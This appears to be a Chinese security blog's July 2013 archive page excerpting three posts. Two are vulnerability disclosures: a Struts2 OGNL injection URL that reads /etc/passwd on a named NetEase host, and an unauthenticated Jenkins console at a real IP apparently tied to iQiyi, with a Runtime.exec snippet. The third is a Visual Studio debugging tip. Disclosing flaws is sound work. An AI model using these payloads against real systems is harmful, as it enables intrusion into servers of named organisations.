月度归档: 2013年7月

6 篇文章

网易某系统命令执行
网易某系统命令执行,经典Struts2漏洞复现,如下图: http://analytics.ws.netease.com/login.action?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27cat%27,%27/etc/passwd%27}%29%29.start%28%29,…
奇艺某系统未授权访问可执行任意命令
http://220.181.109.120:8080/ Jenkins平台,未授权访问,应该是奇艺的,看图: 还可以直接执行命令呢,继续深入的话可渗透内网(未授权不敢测试) Runtime runtime = Runtime.getRuntime(); Process process = runtime.exec("id"); process.getInputStream(); Buffered…
如何解决未经处理的win32异常
在安装完Visual Studio经常会遇到一个问题是,在打开IE或浏览网页的时候,都会出现iexplore.exe[XXXX]发生了未经处理的win32异常,还调Visual Studio用户要么启动实时调试,用户要么启动实时调试,要么忽略该异常.非常麻烦,网上也讲了好多解决办法,什么在visual studio(工具-选项-调试-实时-把右边那些本机\脚本\托管)这些钩都去掉等等,我试过了不还…